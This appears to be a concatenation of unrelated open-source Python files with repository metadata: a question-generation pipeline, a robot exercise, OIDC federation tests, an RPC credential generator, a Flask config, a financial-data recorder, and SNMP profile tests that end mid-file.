import itertools import logging from typing import Optional, Dict, Union from nltk import sent_tokenize import torch from transformers import( AutoModelForSeq2SeqLM, AutoTokenizer, PreTrainedModel, PreTrainedTokenizer, ) logger = logging.getLogger(__name__) class QGPipeline: """Poor man's QG pipeline""" def __init__( self, model: PreTrainedModel, tokenizer: PreTrainedTokenizer, ans_model: PreTrainedModel, ans_tokenizer: PreTrainedTokenizer, qg_format: str, use_cuda: bool ): self.model = model self.tokenizer = tokenizer self.ans_model = ans_model self.ans_tokenizer = ans_tokenizer self.qg_format = qg_format self.device = "cuda" if torch.cuda.is_available() and use_cuda else "cpu" self.model.to(self.device) if self.ans_model is not self.model: self.ans_model.to(self.device) assert self.model.__class__.__name__ in [ "T5ForConditionalGeneration", "BartForConditionalGeneration"] if "T5ForConditionalGeneration" in self.model.__class__.__name__: self.model_type = "t5" else: self.model_type = "bart" def __call__(self, inputs: str): inputs = " ".join(inputs.split()) sents, answers = self._extract_answers(inputs) flat_answers = list(itertools.chain(*answers)) if len(flat_answers) == 0: return [] if self.qg_format == "prepend": qg_examples = self._prepare_inputs_for_qg_from_answers_prepend( inputs, answers) else: qg_examples = self._prepare_inputs_for_qg_from_answers_hl( sents, answers) qg_inputs = [example['source_text'] for example in qg_examples] questions = self._generate_questions(qg_inputs) output = [{'answer': example['answer'], 'question': que} for example, que in zip(qg_examples, questions)] return output def _generate_questions(self, inputs): inputs = self._tokenize(inputs, padding=True, truncation=True) outs = self.model.generate( input_ids=inputs['input_ids'].to(self.device), attention_mask=inputs['attention_mask'].to(self.device), max_length=32, num_beams=4, ) questions = [self.tokenizer.decode( ids, skip_special_tokens=True) for ids in outs] return questions def _extract_answers(self, context): sents, inputs = self._prepare_inputs_for_ans_extraction(context) inputs = self._tokenize(inputs, padding=True, truncation=True) outs = self.ans_model.generate( input_ids=inputs['input_ids'].to(self.device), attention_mask=inputs['attention_mask'].to(self.device), max_length=32, ) dec = [self.ans_tokenizer.decode( ids, skip_special_tokens=False) for ids in outs] answers = [item.split('<sep>') for item in dec] answers = [i[:-1] for i in answers] return sents, answers def _tokenize(self, inputs, padding=True, truncation=True, add_special_tokens=True, max_length=512 ): inputs = self.tokenizer.batch_encode_plus( inputs, max_length=max_length, add_special_tokens=add_special_tokens, truncation=truncation, padding="max_length" if padding else False, pad_to_max_length=padding, return_tensors="pt" ) return inputs def _prepare_inputs_for_ans_extraction(self, text): sents = sent_tokenize(text) inputs = [] for i in range(len(sents)): source_text = "extract answers:" for j, sent in enumerate(sents): if i == j: sent = "<hl> %s <hl>" % sent source_text = "%s %s" % (source_text, sent) source_text = source_text.strip() if self.model_type == "t5": source_text = source_text + " </s>" inputs.append(source_text) return sents, inputs def _prepare_inputs_for_qg_from_answers_hl(self, sents, answers): inputs = [] for i, answer in enumerate(answers): if len(answer) == 0: continue for answer_text in answer: try: sent = sents[i] sents_copy = sents[:] answer_text = answer_text.strip() ans_start_idx = sent.index(answer_text) sent = f"{sent[:ans_start_idx]} <hl> {answer_text} <hl> {sent[ans_start_idx + len(answer_text): ]}" sents_copy[i] = sent source_text = " ".join(sents_copy) source_text = f"generate question: {source_text}" if self.model_type == "t5": source_text = source_text + " </s>" inputs.append( {"answer": answer_text, "source_text": source_text}) except Exception as e: logger.exception("Error getting answer %s" % e) return inputs def _prepare_inputs_for_qg_from_answers_prepend(self, context, answers): flat_answers = list(itertools.chain(*answers)) examples = [] for answer in flat_answers: source_text = f"answer: {answer} context: {context}" if self.model_type == "t5": source_text = source_text + " </s>" examples.append({"answer": answer, "source_text": source_text}) return examples class MultiTaskQAQGPipeline(QGPipeline): def __init__(self, **kwargs): super().__init__(**kwargs) def __call__(self, inputs: Union[Dict, str]): if type(inputs) is str: # do qg return super().__call__(inputs) else: # do qa return self._extract_answer(inputs["question"], inputs["context"]) def _prepare_inputs_for_qa(self, question, context): source_text = f"question: {question} context: {context}" if self.model_type == "t5": source_text = source_text + " </s>" return source_text def _extract_answer(self, question, context): source_text = self._prepare_inputs_for_qa(question, context) inputs = self._tokenize([source_text], padding=False) outs = self.model.generate( input_ids=inputs['input_ids'].to(self.device), attention_mask=inputs['attention_mask'].to(self.device), max_length=16, ) answer = self.tokenizer.decode(outs[0], skip_special_tokens=True) return answer class E2EQGPipeline: def __init__( self, model: PreTrainedModel, tokenizer: PreTrainedTokenizer, use_cuda: bool ): self.model = model self.tokenizer = tokenizer self.device = "cuda" if torch.cuda.is_available() and use_cuda else "cpu" self.model.to(self.device) assert self.model.__class__.__name__ in [ "T5ForConditionalGeneration", "BartForConditionalGeneration"] if "T5ForConditionalGeneration" in self.model.__class__.__name__: self.model_type = "t5" else: self.model_type = "bart" self.default_generate_kwargs = { "max_length": 256, "num_beams": 4, "length_penalty": 1.5, "no_repeat_ngram_size": 3, "early_stopping": True, } def __call__(self, context: str, **generate_kwargs): inputs = self._prepare_inputs_for_e2e_qg(context) # TODO: when overrding default_generate_kwargs all other arguments need to be passsed # find a better way to do this if not generate_kwargs: generate_kwargs = self.default_generate_kwargs input_length = inputs["input_ids"].shape[-1] # max_length = generate_kwargs.get("max_length", 256) # if input_length < max_length: # logger.warning( # "Your max_length is set to {}, but you input_length is only {}. You might consider decreasing max_length manually, e.g. summarizer('...', max_length=50)".format( # max_length, input_length # ) # ) outs = self.model.generate( input_ids=inputs['input_ids'].to(self.device), attention_mask=inputs['attention_mask'].to(self.device), **generate_kwargs ) prediction = self.tokenizer.decode(outs[0], skip_special_tokens=True) questions = prediction.split("<sep>") questions = [question.strip() for question in questions[:-1]] return questions def _prepare_inputs_for_e2e_qg(self, context): source_text = f"generate questions: {context}" if self.model_type == "t5": source_text = source_text + " </s>" inputs = self._tokenize([source_text], padding=False) return inputs def _tokenize( self, inputs, padding=True, truncation=True, add_special_tokens=True, max_length=512 ): inputs = self.tokenizer.batch_encode_plus( inputs, max_length=max_length, add_special_tokens=add_special_tokens, truncation=truncation, padding="max_length" if padding else False, pad_to_max_length=padding, return_tensors="pt" ) return inputs SUPPORTED_TASKS = { "question-generation": { "impl": QGPipeline, "default": { "model": "valhalla/t5-small-qg-hl", "ans_model": "valhalla/t5-small-qa-qg-hl", } }, "multitask-qa-qg": { "impl": MultiTaskQAQGPipeline, "default": { "model": "valhalla/t5-small-qa-qg-hl", } }, "e2e-qg": { "impl": E2EQGPipeline, "default": { "model": "valhalla/t5-small-e2e-qg", } } } def pipeline( task: str, model: Optional = None, tokenizer: Optional[Union[str, PreTrainedTokenizer]] = None, qg_format: Optional[str] = "highlight", ans_model: Optional = None, ans_tokenizer: Optional[Union[str, PreTrainedTokenizer]] = None, use_cuda: Optional[bool] = True, **kwargs, ): # Retrieve the task if task not in SUPPORTED_TASKS: raise KeyError("Unknown task {}, available tasks are {}".format( task, list(SUPPORTED_TASKS.keys()))) targeted_task = SUPPORTED_TASKS[task] task_class = targeted_task["impl"] # Use default model/config/tokenizer for the task if no model is provided if model is None: model = targeted_task["default"]["model"] # Try to infer tokenizer from model or config name (if provided as str) if tokenizer is None: if isinstance(model, str): tokenizer = model else: # Impossible to guest what is the right tokenizer here raise Exception( "Impossible to guess which tokenizer to use. " "Please provided a PretrainedTokenizer class or a path/identifier to a pretrained tokenizer." ) # Instantiate tokenizer if needed if isinstance(tokenizer, (str, tuple)): if isinstance(tokenizer, tuple): # For tuple we have (tokenizer name, {kwargs}) tokenizer = AutoTokenizer.from_pretrained( tokenizer[0], **tokenizer[1]) else: tokenizer = AutoTokenizer.from_pretrained(tokenizer) # Instantiate model if needed if isinstance(model, str): model = AutoModelForSeq2SeqLM.from_pretrained(model) if task == "question-generation": if ans_model is None: # load default ans model ans_model = targeted_task["default"]["ans_model"] ans_tokenizer = AutoTokenizer.from_pretrained(ans_model) ans_model = AutoModelForSeq2SeqLM.from_pretrained(ans_model) else: # Try to infer tokenizer from model or config name (if provided as str) if ans_tokenizer is None: if isinstance(ans_model, str): ans_tokenizer = ans_model else: # Impossible to guest what is the right tokenizer here raise Exception( "Impossible to guess which tokenizer to use. " "Please provided a PretrainedTokenizer class or a path/identifier to a pretrained tokenizer." ) # Instantiate tokenizer if needed if isinstance(ans_tokenizer, (str, tuple)): if isinstance(ans_tokenizer, tuple): # For tuple we have (tokenizer name, {kwargs}) ans_tokenizer = AutoTokenizer.from_pretrained( ans_tokenizer[0], **ans_tokenizer[1]) else: ans_tokenizer = AutoTokenizer.from_pretrained( ans_tokenizer) if isinstance(ans_model, str): ans_model = AutoModelForSeq2SeqLM.from_pretrained(ans_model) if task == "e2e-qg": return task_class(model=model, tokenizer=tokenizer, use_cuda=use_cuda) elif task == "question-generation": return task_class(model=model, tokenizer=tokenizer, ans_model=ans_model, ans_tokenizer=ans_tokenizer, qg_format=qg_format, use_cuda=use_cuda) else: return task_class(model=model, tokenizer=tokenizer, ans_model=model, ans_tokenizer=tokenizer, qg_format=qg_format, use_cuda=use_cuda)
34.224138
179
0.59158
debae7eecb3a915e6d20c4737934f796dd5c57b7
1,794
py
Python
src/m1_motion.py
boewebe/06-IntroductionToRobots
85df9a4caccd4246e3674753a81fe0ae687090d3
[ "MIT" ]
null
null
null
src/m1_motion.py
boewebe/06-IntroductionToRobots
85df9a4caccd4246e3674753a81fe0ae687090d3
[ "MIT" ]
null
null
null
src/m1_motion.py
boewebe/06-IntroductionToRobots
85df9a4caccd4246e3674753a81fe0ae687090d3
[ "MIT" ]
null
null
null
""" An opportunity to explore how to make an EV3 Robot move. Authors: Dave Fisher, David Mutchler, Vibha Alangar, their colleagues, and Brendan Boewe. """ # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE. # ----------------------------------------------------------------------------- # TODO: 2. # Follow along with the lecture to run this program: # - Using SSH from your computer # When you have successfully run this program, change this _TODO_ to DONE. # ----------------------------------------------------------------------------- import simple_rosebotics as rb import time def main(): """ Calls the other functions to test/demo them. """ go_two_seconds() def go_two_seconds(): # ------------------------------------------------------------------------- # TODO: 3. # Make the robot move, by using this pattern: # - Turn on (start) the wheel motors. # - time.sleep(2) # Pause here, let other processes run for 2 seconds # - Turn off (brake or coast) the wheel motors. # # Use the DOT trick to figure out how to start, brake and coast motors. # ------------------------------------------------------------------------- left_motor = rb.LargeMotor(rb.Plug("B")) # Constructs Motor for left wheel left_motor.start() time.sleep(2) left_motor.brake() def run_test_go_inches(): """ Tests the go_inches function. """ # TODO: 4. Implement this function with at least 3 calls to go_inches # with various inches and speeds. def go_inches(inches, percent_of_max_speed): """ Makes the EV3 Robot move the given number of inches at the given speed. :type inches: float :type percent_of_max_speed: float -100 to 100 """ # TODO: 5. Implement and test this function. main()
32.035714
79
0.554069
7e0647d92db805932df3616a04c69ccd7d1c34eb
6,761
py
Python
tests/test_07_oob_entity.py
sklemer1/fedoidcmsg
b5e48de7a2e55c93915df1b274770134e77888c8
[ "Apache-2.0" ]
1
2018-05-09T20:47:06.000Z
2018-05-09T20:47:06.000Z
tests/test_07_oob_entity.py
sklemer1/fedoidcmsg
b5e48de7a2e55c93915df1b274770134e77888c8
[ "Apache-2.0" ]
null
null
null
tests/test_07_oob_entity.py
sklemer1/fedoidcmsg
b5e48de7a2e55c93915df1b274770134e77888c8
[ "Apache-2.0" ]
1
2018-10-04T13:55:58.000Z
2018-10-04T13:55:58.000Z
import os from urllib.parse import quote_plus from oidcmsg.key_jar import KeyJar from oidcmsg.key_jar import build_keyjar from oidcmsg.key_jar import public_keys_keyjar from oidcmsg.oauth2 import Message from fedoidcmsg import MetadataStatement from fedoidcmsg.bundle import JWKSBundle from fedoidcmsg.entity import FederationEntity from fedoidcmsg.entity import FederationEntityOOB from fedoidcmsg.entity import make_federation_entity from fedoidcmsg.operator import Operator from fedoidcmsg.signing_service import InternalSigningService from fedoidcmsg.test_utils import make_signing_sequence, create_federation_entities KEYDEFS = [ {"type": "RSA", "key": '', "use": ["sig"]}, {"type": "EC", "crv": "P-256", "use": ["sig"]} ] def public_jwks_bundle(jwks_bundle): jb_copy = JWKSBundle('') for fo, kj in jwks_bundle.bundle.items(): kj_copy = KeyJar() for owner in kj.owners(): public_keys_keyjar(kj, owner, kj_copy, owner) jb_copy.bundle[fo] = kj_copy return jb_copy def test_get_metadata_statement(): jb = JWKSBundle('') for iss in ['https://example.org/', 'https://example.com/']: jb[iss] = build_keyjar(KEYDEFS)[1] self_signer = InternalSigningService(keyjar=jb['https://example.com/'], iss='https://example.com/') op = Operator(self_signer=self_signer, iss='https://example.com/') req = MetadataStatement(foo='bar') sms = op.pack_metadata_statement(req, sign_alg='RS256') sms_dir = {'https://example.com': sms} req['metadata_statements'] = Message(**sms_dir) ent = FederationEntity(None, fo_bundle=public_jwks_bundle(jb)) loe = ent.get_metadata_statement(req) assert loe def test_add_sms_spec_to_request(): jb = JWKSBundle('') for iss in ['https://example.org/', 'https://example.com/']: jb[iss] = build_keyjar(KEYDEFS)[1] kj = build_keyjar(KEYDEFS)[1] sign_serv = InternalSigningService('https://signer.example.com', keyjar=kj) ent = FederationEntityOOB(None, self_signer=sign_serv, fo_bundle=public_jwks_bundle(jb), context='response') ent.metadata_statements = { 'response': { 'https://example.org/': 'https://example.org/sms1' } } req = MetadataStatement(foo='bar') ent.add_sms_spec_to_request(req, ['https://example.org/']) assert 'metadata_statement_uris' in req def test_add_signing_keys(): kj = build_keyjar(KEYDEFS)[1] sign_serv = InternalSigningService('https://signer.example.com', keyjar=kj) ent = FederationEntityOOB(None, self_signer=sign_serv) req = MetadataStatement(foo='bar') ent.add_signing_keys(req) assert 'signing_keys' in req _path = os.path.realpath(__file__) root_dir, _fname = os.path.split(_path) def test_make_federation_entity(): config = { 'self_signer': { 'private_path': '{}/private_jwks'.format(root_dir), 'key_defs': KEYDEFS, 'public_path': '{}/public_jwks'.format(root_dir) }, 'sms_dir': '{}/ms/https%3A%2F%2Fsunet.se'.format(root_dir), 'fo_bundle': { 'private_path': '{}/fo_bundle_signing_keys'.format(root_dir), 'key_defs': KEYDEFS, 'public_path': '{}/pub_fo_bundle_signing_keys'.format(root_dir), 'dir': '{}/fo_jwks'.format(root_dir) } } fe = make_federation_entity(config, 'https://op.example.com') assert fe assert isinstance(fe, FederationEntityOOB) assert isinstance(fe.jwks_bundle, JWKSBundle) assert fe.iss == 'https://op.example.com' def test_sequence(): config = { 'self_signer': { 'private_path': '{}/private_jwks'.format(root_dir), 'key_defs': KEYDEFS, 'public_path': '{}/public_jwks'.format(root_dir) }, 'sms_dir': '{}/ms/https%3A%2F%2Fsunet.se'.format(root_dir), 'fo_bundle': { 'private_path': '{}/fo_bundle_signing_keys'.format(root_dir), 'key_defs': KEYDEFS, 'public_path': '{}/pub_fo_bundle_signing_keys'.format(root_dir), 'dir': '{}/fo_jwks'.format(root_dir) }, 'context': 'discovery' } fe = make_federation_entity(config, 'https://op.example.com') req = MetadataStatement(foo='bar') fe.add_sms_spec_to_request(req) fe.add_signing_keys(req) updated_req = fe.self_sign(req, 'https://example.com') assert updated_req assert set(updated_req.keys()) == {'foo', 'signing_keys', 'metadata_statements'} ENTITY = create_federation_entities(['https://op.sunet.se', 'https://sunet.se', 'https://swamid.sunet.se'], KEYDEFS, root_dir=root_dir) def test_update_metadata_statement(): make_signing_sequence(['https://op.sunet.se', 'https://sunet.se', 'https://swamid.sunet.se'], ENTITY) op = ENTITY['https://op.sunet.se'] metadata_statement = MetadataStatement(foo='bar') metadata_statement = op.update_metadata_statement(metadata_statement) assert metadata_statement assert set(metadata_statement.keys()) == {'foo', 'metadata_statements'} swamid = ENTITY['https://swamid.sunet.se'] # on the RP side rp = FederationEntityOOB(None, 'https://rp.sunet.se') # Need the FO bundle, which in this case only needs Swamid's key jb = JWKSBundle('https://rp.sunet.se') _kj = KeyJar() _kj.import_jwks(swamid.self_signer.public_keys(), swamid.iss) jb['https://swamid.sunet.se'] = _kj rp.jwks_bundle = jb l = rp.get_metadata_statement(metadata_statement, MetadataStatement, 'discovery') assert l[0].iss == 'https://op.sunet.se' assert l[0].fo == 'https://swamid.sunet.se' assert l[0].le == {'foo':'bar'} def test_updating_metadata_no_superior(): op = ENTITY['https://op.sunet.se'] op.metadata_statements['discovery'] = {} metadata_statement = MetadataStatement(foo='bar') metadata_statement = op.update_metadata_statement(metadata_statement) assert metadata_statement assert set(metadata_statement.keys()) == {'foo', 'metadata_statements'} # swamid = ENTITY['https://swamid.sunet.se'] # on the RP side rp = FederationEntityOOB(None, 'https://rp.sunet.se') l = rp.get_metadata_statement(metadata_statement, MetadataStatement, 'discovery') assert l[0].iss == 'https://op.sunet.se' assert l[0].fo == 'https://op.sunet.se' assert l[0].le == {'foo':'bar'}
35.213542
83
0.633782
4d4db935980cef08c9a01f37d8841233ce019348
1,113
py
Python
share/rpcuser/rpcuser.py
VadiqueMe/dogecoin
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
[ "MIT" ]
1
2021-01-03T13:55:19.000Z
2021-01-03T13:55:19.000Z
share/rpcuser/rpcuser.py
VadiqueMe/dogecoin
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
[ "MIT" ]
2
2020-01-01T05:27:26.000Z
2021-01-06T08:04:47.000Z
share/rpcuser/rpcuser.py
VadiqueMe/dogecoin
e1aeae0e40dbc13c17fd8f8c0cc5c639e936b10f
[ "MIT" ]
1
2021-01-03T13:39:37.000Z
2021-01-03T13:39:37.000Z
#!/usr/bin/env python2 # Copyright (c) 2015-2016 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php import hashlib import sys import os from random import SystemRandom import base64 import hmac if len(sys.argv) < 2: sys.stderr.write('Please include username as an argument.\n') sys.exit(0) username = sys.argv[1] #This uses os.urandom() underneath cryptogen = SystemRandom() #Create 16 byte hex salt salt_sequence = [cryptogen.randrange(256) for i in range(16)] hexseq = list(map(hex, salt_sequence)) salt = "".join([x[2:] for x in hexseq]) #Create 32 byte b64 password password = base64.urlsafe_b64encode(os.urandom(32)) digestmod = hashlib.sha256 if sys.version_info.major >= 3: password = password.decode('utf-8') digestmod = 'SHA256' m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod) result = m.hexdigest() print("String to be appended to bitcoin.conf:") print("rpcauth="+username+":"+salt+"$"+result) print("Your password:\n"+password)
26.5
79
0.728661
85e15bb11c30c485cadae7a08d9507c19011677c
632
py
Python
config.py
jamietsadler/itx_nabla
c9696c75f9ca02796b9c89e4656013722f15b075
[ "MIT" ]
null
null
null
config.py
jamietsadler/itx_nabla
c9696c75f9ca02796b9c89e4656013722f15b075
[ "MIT" ]
60
2021-09-13T07:19:50.000Z
2022-03-29T07:18:18.000Z
config.py
jamietsadler/itx_nabla
c9696c75f9ca02796b9c89e4656013722f15b075
[ "MIT" ]
null
null
null
"""Flask configuration.""" from os import environ, path from dotenv import load_dotenv basedir = path.abspath(path.dirname(__file__)) load_dotenv(path.join(basedir, '.env')) class Config: """Set Flask config variables.""" FLASK_ENV = 'development' TESTING = True SECRET_KEY = environ.get('SECRET_KEY') STATIC_FOLDER = 'static' TEMPLATES_FOLDER = 'templates' # Database SQLALCHEMY_DATABASE_URI = environ.get('SQLALCHEMY_DATABASE_URI') SQLALCHEMY_TRACK_MODIFICATIONS = False # # AWS Secrets # AWS_SECRET_KEY = environ.get('AWS_SECRET_KEY') # AWS_KEY_ID = environ.get('AWS_KEY_ID')
26.333333
68
0.712025
5afee75a91dc41f48230b292ccc4813ddf9fab99
2,077
py
Python
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
Evergreen2020/zvt
446a2512d716a38a12164b6d4468a6c9de01b986
[ "MIT" ]
1
2020-04-06T04:17:53.000Z
2020-04-06T04:17:53.000Z
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
Evergreen2020/zvt
446a2512d716a38a12164b6d4468a6c9de01b986
[ "MIT" ]
2
2019-12-20T13:12:30.000Z
2020-01-03T06:24:30.000Z
zvt/recorders/eastmoney/dividend_financing/spo_detail_recorder.py
Evergreen2020/zvt
446a2512d716a38a12164b6d4468a6c9de01b986
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from zvdata.utils.pd_utils import pd_is_not_null from zvdata.utils.time_utils import now_pd_timestamp from zvdata.utils.utils import to_float from zvt.api.api import get_dividend_financing, get_spo_detail from zvt.domain import SpoDetail, DividendFinancing from zvt.recorders.eastmoney.common import EastmoneyPageabeDataRecorder class SPODetailRecorder(EastmoneyPageabeDataRecorder): data_schema = SpoDetail url = 'https://emh5.eastmoney.com/api/FenHongRongZi/GetZengFaMingXiList' page_url = url path_fields = ['ZengFaMingXiList'] def get_original_time_field(self): return 'ZengFaShiJian' def get_data_map(self): return { "spo_issues": ("ShiJiZengFa", to_float), "spo_price": ("ZengFaJiaGe", to_float), "spo_raising_fund": ("ShiJiMuJi", to_float) } def on_finish(self): last_year = str(now_pd_timestamp().year) codes = [item.code for item in self.entities] need_filleds = get_dividend_financing(provider=self.provider, codes=codes, return_type='domain', session=self.session, filters=[DividendFinancing.spo_raising_fund.is_(None)], end_timestamp=last_year) for item in need_filleds: df = get_spo_detail(provider=self.provider, entity_id=item.entity_id, columns=[SpoDetail.timestamp, SpoDetail.spo_raising_fund], start_timestamp=item.timestamp, end_timestamp="{}-12-31".format(item.timestamp.year)) if pd_is_not_null(df): item.spo_raising_fund = df['spo_raising_fund'].sum() self.session.commit() super().on_finish() __all__ = ['SPODetailRecorder'] if __name__ == '__main__': # init_log('spo_detail.log') recorder = SPODetailRecorder(codes=['000999']) recorder.run()
38.462963
101
0.614829
04f3516c6d09788a13ae0fe4217bfa02721bc48b
82,178
py
Python
snmp/tests/test_profiles.py
szibis/integrations-core
e8eb6484a7aea40f5919929e02608cbe4babaacf
[ "BSD-3-Clause" ]
null
null
null
snmp/tests/test_profiles.py
szibis/integrations-core
e8eb6484a7aea40f5919929e02608cbe4babaacf
[ "BSD-3-Clause" ]
null
null
null
snmp/tests/test_profiles.py
szibis/integrations-core
e8eb6484a7aea40f5919929e02608cbe4babaacf
[ "BSD-3-Clause" ]
null
null
null
# (C) Datadog, Inc. 2020-present # All rights reserved # Licensed under Simplified BSD License (see LICENSE) import logging import pytest from datadog_checks.base import ConfigurationError from datadog_checks.dev.utils import get_metadata_metrics from datadog_checks.snmp import SnmpCheck from datadog_checks.snmp.utils import get_profile_definition, recursively_expand_base_profiles from . import common from .metrics import ( ADAPTER_IF_COUNTS, CCCA_ROUTER_GAUGES, CIE_METRICS, CPU_METRICS, DISK_GAUGES, DRS_GAUGES, FRU_METRICS, IF_COUNTS, IF_GAUGES, IF_RATES, IP_COUNTS, IP_IF_COUNTS, IPX_COUNTS, LTM_GAUGES, LTM_NODES_COUNTS, LTM_NODES_GAUGES, LTM_NODES_RATES, LTM_POOL_COUNTS, LTM_POOL_GAUGES, LTM_POOL_MEMBER_COUNTS, LTM_POOL_MEMBER_GAUGES, LTM_POOL_MEMBER_RATES, LTM_POOL_RATES, LTM_VIRTUAL_SERVER_COUNTS, LTM_VIRTUAL_SERVER_GAUGES, LTM_VIRTUAL_SERVER_RATES, MEMORY_METRICS, PEER_GAUGES, PEER_RATES, PROBE_GAUGES, SYSTEM_STATUS_GAUGES, TCP_COUNTS, TCP_GAUGES, UDP_COUNTS, VOLTAGE_GAUGES, ) pytestmark = common.python_autodiscovery_only def test_load_profiles(caplog): instance = common.generate_instance_config([]) check = SnmpCheck('snmp', {}, [instance]) caplog.at_level(logging.WARNING) for name, profile in check.profiles.items(): try: check._config.refresh_with_profile(profile) except ConfigurationError as e: pytest.fail("Profile `{}` is not configured correctly: {}".format(name, e)) assert "table doesn't have a 'metric_tags' section" not in caplog.text caplog.clear() def run_profile_check(recording_name): """ Run a single check with the provided `recording_name` used as `community_string` by the docker SNMP endpoint. """ instance = common.generate_instance_config([]) instance['community_string'] = recording_name instance['enforce_mib_constraints'] = False check = SnmpCheck('snmp', {}, [instance]) check.check(instance) @pytest.mark.unit @pytest.mark.parametrize( 'definition_file, equivalent_definition', [ pytest.param('_base_cisco.yaml', {'extends': ['_base.yaml', '_cisco-generic.yaml']}, id='generic'), pytest.param( '_base_cisco_voice.yaml', {'extends': ['_base.yaml', '_cisco-generic.yaml', '_cisco-voice.yaml']}, id='voice', ), ], ) def test_compat_cisco_base_profiles(definition_file, equivalent_definition): # type: (str, dict) -> None """ Cisco and Cisco Voice base profiles were replaced by mixins (see Pull #6792). But their definition files should still be present and contain equivalent metrics to ensure backward compatibility. """ definition = get_profile_definition({'definition_file': definition_file}) recursively_expand_base_profiles(definition) recursively_expand_base_profiles(equivalent_definition) assert definition == equivalent_definition @pytest.mark.usefixtures("dd_environment") def test_cisco_voice(aggregator): run_profile_check('cisco_icm') tags = ['snmp_profile:cisco_icm', 'snmp_host:test'] + common.CHECK_TAGS resources = ["hrSWRunPerfMem", "hrSWRunPerfCPU"] common.assert_common_metrics(aggregator, tags) for resource in resources: aggregator.assert_metric('snmp.{}'.format(resource), metric_type=aggregator.GAUGE, tags=tags) run_indices = [4, 7, 8, 9, 10, 18, 24, 29, 30] for index in run_indices: status_tags = tags + ['run_index:{}'.format(index)] aggregator.assert_metric('snmp.hrSWRunStatus', metric_type=aggregator.GAUGE, tags=status_tags) cvp_gauges = [ "ccvpSipIntAvgLatency1", "ccvpSipIntAvgLatency2", "ccvpSipIntConnectsRcv", "ccvpSipIntNewCalls", "ccvpSipRtActiveCalls", "ccvpSipRtTotalCallLegs", "ccvpLicRtPortsInUse", "ccvpLicAggMaxPortsInUse", ] for cvp in cvp_gauges: aggregator.assert_metric('snmp.{}'.format(cvp), metric_type=aggregator.GAUGE, tags=tags) ccms_counts = ["ccmRejectedPhones", "ccmUnregisteredPhones"] ccms_gauges = ["ccmRegisteredGateways", "ccmRegisteredPhones"] for ccm in ccms_counts: aggregator.assert_metric('snmp.{}'.format(ccm), metric_type=aggregator.RATE, tags=tags) for ccm in ccms_gauges: aggregator.assert_metric('snmp.{}'.format(ccm), metric_type=aggregator.GAUGE, tags=tags) calls = [ "cvCallVolPeerIncomingCalls", "cvCallVolPeerOutgoingCalls", ] peers = [4, 13, 14, 17, 18, 22, 25, 30, 31] for call in calls: for peer in peers: peer_tags = tags + ["peer_index:{}".format(peer)] aggregator.assert_metric('snmp.{}'.format(call), metric_type=aggregator.GAUGE, tags=peer_tags) calls = [ "cvCallVolMediaIncomingCalls", "cvCallVolMediaOutgoingCalls", ] for call in calls: aggregator.assert_metric('snmp.{}'.format(call), metric_type=aggregator.GAUGE, tags=tags) dial_controls = [ "dialCtlPeerStatsAcceptCalls", "dialCtlPeerStatsFailCalls", "dialCtlPeerStatsRefuseCalls", "dialCtlPeerStatsSuccessCalls", ] for ctl in dial_controls: aggregator.assert_metric( 'snmp.{}'.format(ctl), metric_type=aggregator.MONOTONIC_COUNT, tags=["peer_index:7"] + tags ) pim_tags = tags + ['pim_host:test', 'pim_name:name', 'pim_num:2'] aggregator.assert_metric('snmp.{}'.format("cccaPimStatus"), metric_type=aggregator.GAUGE, tags=pim_tags) aggregator.assert_metric('snmp.{}'.format("sysUpTimeInstance"), metric_type=aggregator.GAUGE, tags=tags, count=1) instance_numbers = ['4446', '5179', '12093', '19363', '25033', '37738', '42562', '51845', '62906', '63361'] for metric in CCCA_ROUTER_GAUGES: for instance_number in instance_numbers: instance_tags = tags + ['instance_number:{}'.format(instance_number)] aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=instance_tags) aggregator.assert_all_metrics_covered() @pytest.mark.usefixtures("dd_environment") def test_f5(aggregator): run_profile_check('f5') gauges = [ 'sysStatMemoryTotal', 'sysStatMemoryUsed', 'sysGlobalTmmStatMemoryTotal', 'sysGlobalTmmStatMemoryUsed', 'sysGlobalHostOtherMemoryTotal', 'sysGlobalHostOtherMemoryUsed', 'sysGlobalHostSwapTotal', 'sysGlobalHostSwapUsed', 'sysTcpStatOpen', 'sysTcpStatCloseWait', 'sysTcpStatFinWait', 'sysTcpStatTimeWait', 'sysUdpStatOpen', 'sysClientsslStatCurConns', ] counts = [ 'sysTcpStatAccepts', 'sysTcpStatAcceptfails', 'sysTcpStatConnects', 'sysTcpStatConnfails', 'sysUdpStatAccepts', 'sysUdpStatAcceptfails', 'sysUdpStatConnects', 'sysUdpStatConnfails', 'sysClientsslStatEncryptedBytesIn', 'sysClientsslStatEncryptedBytesOut', 'sysClientsslStatDecryptedBytesIn', 'sysClientsslStatDecryptedBytesOut', 'sysClientsslStatHandshakeFailures', ] cpu_rates = [ 'sysMultiHostCpuUser', 'sysMultiHostCpuNice', 'sysMultiHostCpuSystem', 'sysMultiHostCpuIdle', 'sysMultiHostCpuIrq', 'sysMultiHostCpuSoftirq', 'sysMultiHostCpuIowait', ] interfaces = ['1.0', 'mgmt', '/Common/internal', '/Common/http-tunnel', '/Common/socks-tunnel'] tags = ['snmp_profile:f5-big-ip', 'snmp_host:f5-big-ip-adc-good-byol-1-vm.c.datadog-integrations-lab.internal'] tags += common.CHECK_TAGS common.assert_common_metrics(aggregator, tags) for metric in gauges: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1) for metric in counts: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1) for metric in cpu_rates: aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=['cpu:0'] + tags, count=1) aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=['cpu:1'] + tags, count=1) for interface in interfaces: interface_tags = ['interface:{}'.format(interface)] + tags for metric in IF_COUNTS: aggregator.assert_metric( 'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=interface_tags, count=1, ) for metric in IF_RATES: aggregator.assert_metric( 